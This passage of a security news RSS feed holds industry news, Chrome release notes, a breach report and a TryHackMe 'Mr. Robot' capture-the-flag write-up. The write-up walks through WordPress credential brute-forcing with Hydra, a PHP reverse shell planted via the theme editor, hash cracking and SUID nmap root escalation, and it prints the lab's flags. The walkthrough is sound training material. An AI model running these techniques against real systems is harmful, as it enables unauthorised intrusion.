<p><a href="https://www.infotech.com/profiles/shashi-bellamkonda" target="_blank" rel="noreferrer noopener">Shashi Bellamkonda</a>, principal research director at Info-Tech Research Group, looks at the potential acquisition, while it will potentially deliver benefits, as suffering from many practical roadblocks.  </p>



<p>“Qualcomm is chasing what you might call model democracy,” he said, noting that today, AI deployment teams are locked to whatever accelerator they trained on, and moving a model to different hardware means re-engineering, not just configuration changes.</p>



<p>“Modular’s pitch is that this goes away: build once, run across CPU, GPU, NPU, whatever the infrastructure calls for,” Bellamkonda said. “That’s a credible goal. The catch is that democracy and portability aren’t the same thing. Qualcomm will tune hardest for Qualcomm silicon. Every hardware company does. Vendor-neutral software foundations have a habit of developing hardware preferences once their acquirers need to differentiate silicon.”</p>



<p><a href="https://www.linkedin.com/in/fvillanustre/" target="_blank" rel="noreferrer noopener">Flavio Villanustre</a>, CISO for the LexisNexis Risk Solutions Group, provided a different perspective. </p>



<p>“I think it’s important to clarify that Modular is behind the Mojo programming language, which provides an abstraction layer for AI models, enabling them to run across different hardware architectures,” he said. “In the traditional approach, if you code an AI stack on Python or C and target a particular hardware architecture, such as X86, Nvidia GPU, AMD GPU, or TPU, you will need to rewrite a significant portion of that to run it on a different architecture. With Mojo, you code it once and it runs everywhere, even on hybrid systems composed of different hardware architectures.”</p>



<p>And, he said, “if you now consider the fact that Qualcomm owns intellectual property and manufacturing across different hardware architectures, both CPU and GPU, this acquisition could offer their customers significant lift. I see this as Qualcomm buying abstraction that allows them to provide diverse hardware offerings and still offer their customers full code reuse across their entire CPU/GPU/TPU/NPU portfolio.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Early Stable Update for Desktop]]></title>
<description><![CDATA[The Stable channel has been updated to 150.0.7871.46/.47 for Windows and Mac as part of our early stable release to a small percentage of users. A full list of changes in this build is available in the log.You can find more details about early Stable releases here.Interested in switching release ...]]></description>
<link>https://tsecurity.de/de/3622677/it-security-nachrichten/early-stable-update-for-desktop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622677/it-security-nachrichten/early-stable-update-for-desktop/</guid>
<pubDate>Wed, 24 Jun 2026 21:53:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><span>The Stable channel has been updated to </span><span>150.0.7871.46/.47</span><span> for Windows and</span><span> </span><span>Mac </span><span>as part of our early stable release to a <span>small percentage of users. </span>A full list of changes in this build is available in the</span><span> </span><span color="rgba(0, 0, 0, 0.87)"><a href="https://chromium.googlesource.com/chromium/src/+log/149.0.7827.197..150.0.7871.47?pretty=fuller&amp;n=10000">log</a></span><span>.</span></p><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><div class="post-body"><div class="post-content post-original" itemprop="articleBody"><p dir="ltr"><span><span>You can find more details about early Stable releases </span><a href="https://developer.chrome.com/blog/early-stable/"><span>here</span></a><span>.</span></span></p><p dir="ltr"><span>Interested in switching release channels?  Find out how </span><a href="https://www.chromium.org/getting-involved/dev-channel"><span>here</span></a><span>. If you find a new issue, please let us know by </span><a href="https://crbug.com/"><span>filing a bug</span></a><span>. </span><span>The </span><a href="https://support.google.com/chrome/community"><span>community help forum</span></a><span> is also a great place to reach out for help or learn about common issues.</span></p><p><span color="rgba(0, 0, 0, 0.87)"><br></span></p><p dir="ltr"><span>Daniel Yip</span></p><p dir="ltr"><span>Google Chrome</span></p></div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chrome Beta for Desktop Update]]></title>
<description><![CDATA[The Beta channel has been updated to 150.0.7871.46 for Windows, Mac and Linux.A partial list of changes is available in the Git log. Interested in switching release channels? Find out how. If you find a new issue, please let us know by filing a bug. The community help forum is also a great place ...]]></description>
<link>https://tsecurity.de/de/3622436/it-security-nachrichten/chrome-beta-for-desktop-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3622436/it-security-nachrichten/chrome-beta-for-desktop-update/</guid>
<pubDate>Wed, 24 Jun 2026 20:39:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Beta channel has been updated to 150.0.7871.46 for Windows, Mac and Linux.</p><p>A partial list of changes is available in the <a href="https://chromium.googlesource.com/chromium/src/+log/150.0.7871.24..150.0.7871.46?pretty=fuller&amp;n=10000">Git log</a>. Interested in <a href="https://www.chromium.org/getting-involved/dev-channel/">switching</a> release channels? Find out <a href="https://www.chromium.org/getting-involved/dev-channel/">how</a>. If you find a new issue, please let us know by <a href="https://crbug.com/">filing a bug</a>. The <a href="https://productforums.google.com/forum/#!forum/chrome">community help forum</a> is also a great place to reach out for help or learn about common issues.</p><p>Chrome Release Team<br><a href="https://www.google.com/chrome"></a><a href="https://www.google.com/chrome">Google Chrome</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[TryHackMe — Mr. Robot CTF | Full Write-Up]]></title>
<description><![CDATA[Platform: TryHackMeRoom: Mr. Robot CTFDifficulty: MediumAuthor: Shikhali Jamalzade (@alisalive)Date: May 2026Tags: #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.” — Mr. RobotIntroductionThe Mr. ...]]></description>
<link>https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621795/hacking/tryhackme-mr-robot-ctf-full-write-up/</guid>
<pubDate>Wed, 24 Jun 2026 16:55:16 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*oEKhllKIF6aLRt62C2KnOQ.png"></figure><h4><strong>Platform:</strong> <a href="https://tryhackme.com/p/alisalive.exe">TryHackMe</a><br><strong>Room:</strong> <a href="https://tryhackme.com/room/mrrobot">Mr. Robot CTF</a><br><strong>Difficulty:</strong> Medium<br><strong>Author:</strong> Shikhali Jamalzade (<a href="https://github.com/alisalive">@alisalive</a>)<br><strong>Date:</strong> May 2026<br><strong>Tags:</strong> #CTF #TryHackMe #WordPress #PrivilegeEscalation #PenTest #MrRobot</h4><p><em>“Give a man a gun and he can rob a bank. Give a man a bank and he can rob the world.”</em> — Mr. Robot</p><h3>Introduction</h3><p>The <strong>Mr. Robot CTF</strong> room on TryHackMe is inspired by the cult TV series of the same name — a show about hacking, manipulation, and power. Created by security researcher <strong>Leon Johnson</strong>, the room presents a realistic attack surface: a WordPress-powered web server with deliberately weak credentials and a classic privilege escalation vector involving a SUID binary.</p><p>Your mission: find <strong>3 hidden keys</strong> on the machine.</p><p>In this write-up, I’ll walk through every step of the compromise — from initial reconnaissance all the way to root. I’ll explain the <em>why</em> behind each tool and technique, not just the <em>how</em>.</p><h3>Environment Setup</h3><p>Before anything, connect to the TryHackMe VPN:</p><p>bash</p><pre>sudo openvpn your-config.ovpn</pre><p>Once connected, deploy the Mr. Robot machine from the room page. Note the assigned IP (referred to as &lt;TARGET_IP&gt; throughout this write-up).</p><h3>Phase 1 — Reconnaissance</h3><h3>Nmap Port Scan</h3><p>Every engagement begins with understanding the attack surface. We’ll use <strong>nmap</strong> to identify open ports, services, and versions.</p><p>bash</p><pre>nmap -sC -sV -T4 -oN nmap_scan.txt &lt;TARGET_IP&gt;</pre><p><strong>Flag breakdown:</strong></p><ul><li>-sC — Run default NSE scripts (useful for detecting common vulns and misconfigs)</li><li>-sV — Probe service versions</li><li>-T4 — Aggressive timing (faster on stable networks)</li><li>-oN — Save output to file for reference</li></ul><p><strong>Results:</strong></p><pre>PORT    STATE  SERVICE  VERSION<br>80/tcp  open   http     Apache httpd<br>443/tcp open   ssl/http Apache httpd<br>22/tcp  closed ssh</pre><p>Two web servers (HTTP + HTTPS) are running on a standard Apache stack. SSH is closed, so our initial foothold will be through the web.</p><h3>Phase 2 — Web Enumeration</h3><h3>Visiting the Website</h3><p>Navigate to http://&lt;TARGET_IP&gt; in your browser. You'll be greeted by an interactive terminal simulation themed around the Mr. Robot show. It's visually impressive but doesn't contain anything useful for exploitation — feel free to play around though.</p><h3>robots.txt — The First Lead</h3><p>A robots.txt file tells web crawlers which paths to avoid. It's frequently overlooked by developers, but for pentesters it's a goldmine.</p><p>bash</p><pre>curl http://&lt;TARGET_IP&gt;/robots.txt</pre><p><strong>Output:</strong></p><pre>User-agent: *<br>fsocity.dic<br>key-1-of-3.txt</pre><p>Two files are disclosed:</p><ul><li>fsocity.dic — a wordlist (we'll use this to brute-force WordPress)</li><li>key-1-of-3.txt — the first flag</li></ul><p>Download both immediately:</p><p>bash</p><pre>wget http://&lt;TARGET_IP&gt;/fsocity.dic<br>wget http://&lt;TARGET_IP&gt;/key-1-of-3.txt<br>cat key-1-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 1:</em></strong><em> </em><em>073403c8a58a1f80d943455fb30724b9</em></blockquote><h3>Directory Brute-Forcing with Gobuster</h3><p>To map the full attack surface, we enumerate hidden directories:</p><p>bash</p><pre>gobuster dir -u http://&lt;TARGET_IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50</pre><p>Key findings:</p><pre>/wp-login    (Status: 200)<br>/wp-admin    (Status: 301)<br>/robots      (Status: 200)<br>/readme      (Status: 200)<br>/sitemap     (Status: 200)<br>/wp-content  (Status: 301)</pre><p>The presence of /wp-login confirms this is a <strong>WordPress</strong> installation. This opens up a well-documented attack path.</p><h3>Phase 3 — WordPress Credential Brute-Force</h3><h3>Preparing the Wordlist</h3><p>The fsocity.dic file contains <strong>858,160 words</strong> — most of them duplicates. Running a brute-force with this as-is would waste significant time. We deduplicate it first:</p><p>bash</p><pre>wc -w fsocity.dic         # 858160 words<br>sort fsocity.dic | uniq &gt; fs-clean.txt<br>wc -w fs-clean.txt        # 11451 words — a 98.7% reduction</pre><p>Always optimize your wordlists before launching attacks. Speed matters in real engagements.</p><h3>Username Enumeration with Hydra</h3><p>WordPress gives different error messages depending on whether a username exists:</p><ul><li>Invalid username → ERROR: Invalid username.</li><li>Valid username, wrong password → ERROR: The password you entered for the username … is incorrect.</li></ul><p>We exploit this <strong>username enumeration</strong> vulnerability to find valid users first, then pivot to password brute-forcing.</p><p>Start by capturing a failed login request with <strong>Burp Suite</strong> to identify the POST parameters (log and pwd). Then launch Hydra:</p><p>bash</p><pre>hydra -L fs-clean.txt -p test &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><ul><li>-L fs-clean.txt — username wordlist</li><li>-p test — static placeholder password (we only care about username validity here)</li><li>F=Invalid username — string that indicates a failed attempt (Hydra ignores these)</li></ul><p><strong>Result:</strong> Valid username found → elliot</p><h3>Password Brute-Force</h3><p>Now that we have a valid username, we brute-force the password using the same deduplicated list:</p><p>bash</p><pre>hydra -l elliot -P fs-clean.txt &lt;TARGET_IP&gt; http-post-form \<br>  "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p><strong>Result:</strong> Password found → ER28-0652</p><p><strong>Alternative — WPScan:</strong></p><p>bash</p><pre>wpscan --url http://&lt;TARGET_IP&gt; -U elliot -P fs-clean.txt -t 50</pre><p>WPScan is purpose-built for WordPress and tends to be faster for this specific task.</p><h3>Phase 4 — WordPress Remote Code Execution</h3><h3>Gaining Admin Access</h3><p>Navigate to http://&lt;TARGET_IP&gt;/wp-login.php and log in with:</p><ul><li><strong>Username:</strong> elliot</li><li><strong>Password:</strong> ER28-0652</li></ul><p>Elliot has full administrator privileges. Welcome to the dashboard.</p><h3>Uploading a PHP Reverse Shell</h3><p>WordPress administrators can edit theme template files — raw PHP. This is our injection point.</p><p>Navigate to: <strong>Appearance → Theme Editor → Select a template (e.g., </strong><strong>archive.php or </strong><strong>404.php)</strong></p><p>Replace the entire file content with <strong>PentestMonkey’s PHP reverse shell</strong>:</p><pre>https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php</pre><p>Before saving, edit these two lines to match your attacking machine:</p><p>php</p><pre>$ip = '&lt;YOUR_ATTACKING_IP&gt;';   // your TryHackMe VPN IP (tun0)<br>$port = 4444;                   // or any port you choose</pre><p>Click <strong>Update File</strong>.</p><h3>Setting Up the Listener</h3><p>On your attacking machine:</p><p>bash</p><pre>nc -lvnp 4444</pre><h3>Triggering the Shell</h3><p>Now visit the modified template URL in your browser. For the archive.php template, it would be:</p><pre>http://&lt;TARGET_IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><p>Check your terminal — you should have a reverse shell as daemon:</p><p>bash</p><pre>$ whoami<br>daemon</pre><h3>Phase 5 — Post-Exploitation &amp; Key 2</h3><h3>Exploring the Filesystem</h3><p>Navigate to the home directory:</p><p>bash</p><pre>cd /home/robot<br>ls -la</pre><p><strong>Output:</strong></p><pre>-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt<br>-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5</pre><p>We can see key-2-of-3.txt, but it's only readable by the robot user. However, password.raw-md5 is world-readable:</p><p>bash</p><pre>cat password.raw-md5</pre><p><strong>Output:</strong></p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><h3>Cracking the MD5 Hash</h3><p>The hash format is MD5 (hinted by the filename). Crack it using:</p><p><strong>Option 1 — CrackStation (online):</strong> Paste the hash at <a href="https://crackstation.net/">crackstation.net</a></p><p><strong>Option 2 — John the Ripper:</strong></p><p>bash</p><pre>echo "c3fcd3d76192e4007dfb496cca67e13b" &gt; hash.txt<br>john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt</pre><p><strong>Option 3 — Hashcat:</strong></p><p>bash</p><pre>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</pre><p><strong>Result:</strong> abcdefghijklmnopqrstuvwxyz</p><h3>Spawning a Proper TTY Shell</h3><p>Before switching users, we need a fully interactive terminal. Our current shell is a limited “dumb” shell that doesn’t support su. Fix it with Python's pty module:</p><p>bash</p><pre>python -c 'import pty; pty.spawn("/bin/bash")'</pre><p>Now switch to the robot user:</p><p>bash</p><pre>su robot<br># Password: abcdefghijklmnopqrstuvwxyz</pre><p>Read the second key:</p><p>bash</p><pre>cat /home/robot/key-2-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 2:</em></strong><em> </em><em>822c73956184f694993bebb3eb32f0bf</em></blockquote><h3>Phase 6 — Privilege Escalation to Root</h3><p>With robot, we still can't read the third key (located in /root). We need to escalate to root.</p><h3>Finding SUID Binaries</h3><p>SUID (Set User ID) binaries run with the permissions of their <strong>owner</strong> (often root), regardless of who executes them. This is a common and powerful escalation vector.</p><p>bash</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Scan the results. Something unusual stands out:</p><pre>/usr/local/bin/nmap</pre><p><strong>Nmap with SUID?</strong> That’s misconfigured. Older versions of nmap (2.02–5.21) include an --interactive mode that allows shell command execution.</p><h3>GTFOBins — nmap Interactive Mode</h3><p>Verify on <a href="https://gtfobins.github.io/gtfobins/nmap/">GTFOBins</a>:</p><p>bash</p><pre>nmap --interactive</pre><p>Once in nmap’s interactive prompt:</p><pre>nmap&gt; !sh</pre><p>Check your privilege level:</p><p>bash</p><pre>whoami<br># root</pre><p>You now have a root shell.</p><h3>Capturing the Final Key</h3><p>bash</p><pre>cat /root/key-3-of-3.txt</pre><blockquote><em>🚩 </em><strong><em>Key 3:</em></strong><em> </em><em>04787ddef27c3dee1ee161b21670b4e4</em></blockquote><h3>Attack Chain Summary</h3><pre>robots.txt disclosure<br>        ↓<br>Key 1 found (public file)<br>        ↓<br>WordPress discovered via gobuster<br>        ↓<br>Username enumerated via error message difference<br>        ↓<br>Password cracked via Hydra + fsocity.dic wordlist<br>        ↓<br>Admin access → PHP reverse shell injected into theme<br>        ↓<br>Shell as daemon → /home/robot/ explored<br>        ↓<br>MD5 hash cracked → su robot → Key 2<br>        ↓<br>SUID nmap found → nmap --interactive → !sh → root<br>        ↓<br>Key 3 captured</pre><h3>Lessons Learned</h3><p><strong>1. robots.txt is not security.</strong> It’s a disclosure mechanism by design — never put sensitive file paths there.</p><p><strong>2. WordPress login pages expose usernames.</strong> The different error messages for “invalid username” vs “wrong password” enable user enumeration. This is a long-standing WordPress issue.</p><p><strong>3. Wordlist hygiene matters.</strong> Deduplicating fsocity.dic reduced it from 858,160 to 11,451 entries — making the brute-force ~75x faster. Never throw raw wordlists at targets.</p><p><strong>4. Theme editors are code execution.</strong> Any CMS that lets admins write raw PHP to disk is one compromised account away from full RCE.</p><p><strong>5. SUID misconfigurations are everywhere.</strong> Always run find / -perm -u=s -type f 2&gt;/dev/null on post-exploitation. Cross-reference with GTFOBins.</p><p><strong>6. MD5 is not encryption.</strong> It’s a hashing algorithm, and short/predictable passwords will fall to rainbow tables instantly. Use bcrypt, Argon2, or scrypt for password storage.</p><h3>Tools Used</h3><p>Tool Purpose nmap Port scanning &amp; service enumeration gobuster Directory brute-forcing Burp Suite HTTP request interception &amp; analysis Hydra Credential brute-forcing WPScan WordPress-specific enumeration Pentest Monkey PHP Reverse Shell Remote code execution payload Netcat Reverse shell listener John the Ripper / Hashcat Hash cracking GTFOBins SUID exploitation reference</p><h3>Flags</h3><p>1073403c8a58a1f80d943455fb30724b9<br>2822c73956184f694993bebb3eb32f0bf<br>304787ddef27c3dee1ee161b21670b4e4</p><p><em>Thanks for reading. If you have questions or spotted a better path, drop a comment — I’m always up for discussing alternative techniques.</em></p><p><em>If you found this useful, feel free to connect on </em><a href="https://linkedin.com/in/camalzads"><em>LinkedIn</em></a><em> or check out my tools on </em><a href="https://github.com/alisalive"><em>GitHub</em></a><em>.<br></em>and my <a href="https://tryhackme.com/p/alisalive.exe"><em>TryHackMe</em></a></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=f28d83777dde" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/tryhackme-mr-robot-ctf-full-write-up-f28d83777dde">TryHackMe — Mr. Robot CTF | Full Write-Up</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing attack on healthcare firm Xsolis impacts 1.4 million people]]></title>
<description><![CDATA[Healthcare technology company Xsolis confirmed that a phishing attack resulted in unauthorized access to its network. The company develops AI-powered software for hospitals, health systems, and health plans and serves more than 600 hospitals and health insurers. “On January 22,…
Read more →
The p...]]></description>
<link>https://tsecurity.de/de/3621349/it-security-nachrichten/phishing-attack-on-healthcare-firm-xsolis-impacts-14-million-people/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621349/it-security-nachrichten/phishing-attack-on-healthcare-firm-xsolis-impacts-14-million-people/</guid>
<pubDate>Wed, 24 Jun 2026 14:38:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Healthcare technology company Xsolis confirmed that a phishing attack resulted in unauthorized access to its network. The company develops AI-powered software for hospitals, health systems, and health plans and serves more than 600 hospitals and health insurers. “On January 22,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/phishing-attack-on-healthcare-firm-xsolis-impacts-1-4-million-people/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/phishing-attack-on-healthcare-firm-xsolis-impacts-1-4-million-people/">Phishing attack on healthcare firm Xsolis impacts 1.4 million people</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phishing attack on healthcare firm Xsolis impacts 1.4 million people]]></title>
<description><![CDATA[Healthcare technology company Xsolis confirmed that a phishing attack resulted in unauthorized access to its network. The company develops AI-powered software for hospitals, health systems, and health plans and serves more than 600 hospitals and health insurers. “On January 22, 2026, Xsolis becam...]]></description>
<link>https://tsecurity.de/de/3621248/it-security-nachrichten/phishing-attack-on-healthcare-firm-xsolis-impacts-14-million-people/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3621248/it-security-nachrichten/phishing-attack-on-healthcare-firm-xsolis-impacts-14-million-people/</guid>
<pubDate>Wed, 24 Jun 2026 14:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Healthcare technology company Xsolis confirmed that a phishing attack resulted in unauthorized access to its network. The company develops AI-powered software for hospitals, health systems, and health plans and serves more than 600 hospitals and health insurers. “On January 22, 2026, Xsolis became aware of unauthorized activity impacting a limited portion of the Xsolis environment resulting from a targeted phishing attack on January 20, 2026,” Xsolis said. Xsolis said it took immediate action to contain … <a href="https://www.helpnetsecurity.com/2026/06/24/xsolis-data-breach-phishing-attack/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/24/xsolis-data-breach-phishing-attack/">Phishing attack on healthcare firm Xsolis impacts 1.4 million people</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Choosing your AI stack: The benefits of vendor lock-in]]></title>
<description><![CDATA[AI has emerged as a top priority for businesses and a vehicle for transformation, as evidenced by Accenture research: 97% of executives believe AI will transform their company and industry. But as companies move from AI pilots to scaling AI across the enterprise, we have had repeated conversation...]]></description>
<link>https://tsecurity.de/de/3620900/it-nachrichten/choosing-your-ai-stack-the-benefits-of-vendor-lock-in/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3620900/it-nachrichten/choosing-your-ai-stack-the-benefits-of-vendor-lock-in/</guid>
<pubDate>Wed, 24 Jun 2026 12:03:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI has emerged as a top priority for businesses and a vehicle for transformation, as evidenced by <a href="https://www.accenture.com/us-en/insights/consulting/gen-ai-reinventing-enterprise-models" rel="nofollow">Accenture research</a>: 97% of executives believe AI will transform their company and industry. But as companies move from AI pilots to scaling AI across the enterprise, we have had repeated conversations with CIOs and technology leaders who are arriving at the same uncomfortable realization: AI stack decisions are not easily reversible.</p>



<p>Unlike earlier eras of enterprise IT, where abstraction layers insulated applications from hardware choices, today’s AI stack—the infrastructure, technologies and frameworks that powers AI systems – tends  to be tightly co-engineered, with stronger dependencies in the underlying compute layers. Choices made about models, runtimes and compute platforms now shape cost structures, performance ceilings and strategic flexibility. <a href="https://www.accenture.com/content/dam/accenture/final/a-com-migration/pdf/pdf-171/accenture-ever-ready-infrastructure.pdf#zoom=40" rel="nofollow">AI-ready infrastructure</a> has re-emerged as a new source of differentiation, and with it, a new kind of vendor lock-in.</p>



<p>At the center of this shift is the move from training – building AI models – to inference, where those models are used in production to generate outputs from new data. While early attention focused on the cost of training large models, enterprises are now scaling AI across the organization, running models continuously across workflows. This shift significantly changes the economics of AI.</p>



<p>For instance, <a href="https://www.accenture.com/content/dam/accenture/final/accenture-com/document-4/Accenture-The-New-Rules-of-Platform-Strategy-in-the-Age-of-Agentic-AI.pdf#zoom=40" rel="nofollow">agentic AI is reshaping infrastructure architecture and platforms</a> because inference is becoming persistent, stateful and increasingly data intensive. As AI Factories scale, the focus is shifting from peak model performance toward sustainable token economics, where the key differentiators are lowest cost per generated token, power efficiency and infrastructure utilization at scale. In this environment, achieving those outcomes requires full-stack optimization across compute, networking, memory, storage and data fabrics, curated and integrated across ecosystem partners. Secure multitenancy and confidential computing are becoming core design principles, and enterprise AI is now ready to be industrialized at scale.</p>



<h2 class="wp-block-heading">Modern AI infrastructure is a strategic bet</h2>



<p>What makes AI infrastructure different is not just scale, but integration. <a href="https://www.cio.com/article/4176051/8-it-modernization-traps-cios-must-avoid.html?utm=hybrid_search">Modern AI systems</a> are built on tightly co-engineered stacks where GPU accelerators, high-bandwidth interconnects, compilers and runtimes are designed in tandem to maximize throughput and efficiency for AI workloads.</p>



<p>To get the massive computing power required for AI, providers design their hardware and software to work exclusively with one another. This has shifted enterprise decision-making from choosing hardware one piece at a time to committing to ecosystems. And that commitment carries consequences.</p>



<p>In traditional IT environments, applications could also generally move across environments with a manageable amount of effort. In AI systems, that assumption breaks down. What appears portable at the model or application layer often depends on deeply optimized components underneath that layer, such as memory handling and compiler frameworks like CUDA or ROCm that are fine-tuned to specific hardware.</p>



<p>We find it useful to think about AI systems as a layered structure:</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/ai-systems-as-a-layered-structure.png?w=1024" alt="A visualization of AI systems as a layered structure." class="wp-image-4188504" width="1024" height="610" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Accenture</p></div>



<p>While upper layers retain some flexibility, dependencies increase as you move downward. Changing your foundational AI provider often means having to rebuild and re-optimize large portions of your technology from scratch.</p>



<p>This is why infrastructure decisions in AI feel less like procurement choices and more like strategic, high-stakes bets.</p>



<h2 class="wp-block-heading">Why switching AI platforms is harder than it looks</h2>



<p>In theory, switching platforms should be straightforward. Models can be retrained, applications rewritten, and infrastructure replaced. In reality, the cost of switching extends far beyond hardware or licensing.</p>



<ul class="wp-block-list">
<li>The first challenge is <strong>engineering effort</strong>. Migrating to different platforms requires engineers to revalidate model behavior, re-tune inference pipelines, and rebuild performance baselines. During this period, teams spend most of their time stabilizing and not innovating.</li>



<li>The second challenge is <strong>hidden dependency</strong>. Over time, system optimization becomes tied to a specific stack. This might include latency expectations, batching strategies, orchestration logic and even human workflows. These ties are not always obvious, but they shape how systems behave in production.</li>



<li>The third challenge is <strong>timing</strong>. There is never a convenient time to migrate, especially factoring in rising AI infrastructure and inference costs, competitive pressure or scaling demands. Organizations are often forced to switch platforms precisely when disruption is hardest to absorb.</li>
</ul>



<h2 class="wp-block-heading">Rethinking performance vs control</h2>



<p>Despite these barriers, organizations do switch. In our experience, this typically happens under three conditions.</p>



<p>One common trigger is when the opportunity cost of staying begins to outweigh the cost of leaving. As performance gaps widen across competing ecosystems, inefficiencies accumulate to the point that remaining on the current platform is no longer viable. Another driver comes from shifts in vendor dynamics. Pricing volatility, supply constraints, or misalignment in product roadmaps can introduce risks that force a re-evaluation. Finally, regulatory requirements, data sovereignty constraints or geopolitical shifts can force platform changes regardless of technical preference.</p>



<p>Across all three strategies, one principle stands out. Lock-in is not inherently negative, and openness is not inherently superior. Timing matters more than ideology.</p>



<p>Given these dynamics, the central question for CIOs is not how to avoid lock-in, but how to manage it deliberately. This represents a significant shift in strategies that previously considered vendor lock-in as a detriment. In practice, we see three broad approaches emerge, each reflecting a different balance between performance and control.</p>



<p>Some organizations take a performance-first approach. They optimize deeply within a specific ecosystem because performance directly drives business outcomes. <a href="https://blogs.nvidia.com/blog/lilly-ai-factory-nvidia-blackwell-dgx-superpod/" rel="nofollow">Eli Lilly’s AI Factory</a> is a strong example. The company has invested heavily in a tightly integrated NVIDIA-based stack to maximize throughput and utilization. In this case, infrastructure is a competitive lever and not merely a support function. Higher switching costs are accepted because near-term performance advantages are decisive.</p>



<p>Others lean toward a portability-first model. These organizations prioritize flexibility, governance, and long-term independence over absolute performance. <a href="https://group.bnpparibas/en/press-release/bnp-paribas-provides-its-businesses-with-an-llm-as-a-service-platform-to-accelerate-the-industrialization-of-generative-ai-use-cases" rel="nofollow">BNP Paribas</a> illustrates this well through its internal LLM platform built on open-source models and controlled infrastructure. By retaining ownership of the stack, the bank ensures data sovereignty, regulatory alignment and predictable cost.</p>



<p>A growing number are adopting a hybrid approach. Rather than applying a single strategy across the enterprise, they segment workloads based on sensitivity to performance, cost and governance. For example, in late 2024, <a href="https://www.cio.com/article/3616622/jpmorgan-chase-builds-ambitious-ai-foundation-on-aws.html?utm_source=chatgpt.com">JPMorganChase</a> outlined its approach at a leading cloud and technology conference. It described combining a firm-wide internal AI platform with cloud-based services to move generative AI into production at scale. This reflects a broader enterprise pattern of pairing internally controlled environments with external ecosystems to balance control, scalability and cost.</p>



<p>A performance advantage is only valuable if it lasts long enough to justify the lock-in it creates. Similarly, portability only matters if the ecosystem evolves in ways that make switching worthwhile. This is where many organizations struggle. They evaluate platforms based on current benchmarks rather than the direction of the ecosystem.</p>



<p>In practice, we encourage leaders to track a set of evolving signals. These range from the maturity of open compiler ecosystems and improvements in cross-platform runtimes, to shifts in performance per watt and increasing regulatory focus on sovereign AI. Together, these indicators help determine whether the industry is moving toward convergence or further fragmentation.</p>



<h2 class="wp-block-heading">Conclusion</h2>



<p>AI is forcing a reset in how technology leaders think about IT architecture. The goal for CIOs is no longer to eliminate dependency, but to choose it consciously and manage and revisit that choice over time.</p>



<p>In our experience, the most effective organizations treat this as a dynamic problem. They evaluate where performance truly differentiates them, where flexibility protects them, and how quickly those boundaries are shifting. They also recognize that some degree of re-platforming is inevitable and plan for it, rather than treating it as a failure.</p>



<p>Ultimately, AI infrastructure strategy is not about optimizing for today’s conditions. It is about getting ready for where the ecosystem is going next. The leaders who navigate this well are not those who avoid lock-in entirely, but those who understand when to embrace it when to limit it and when to move beyond it before the market forces that decision on them.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
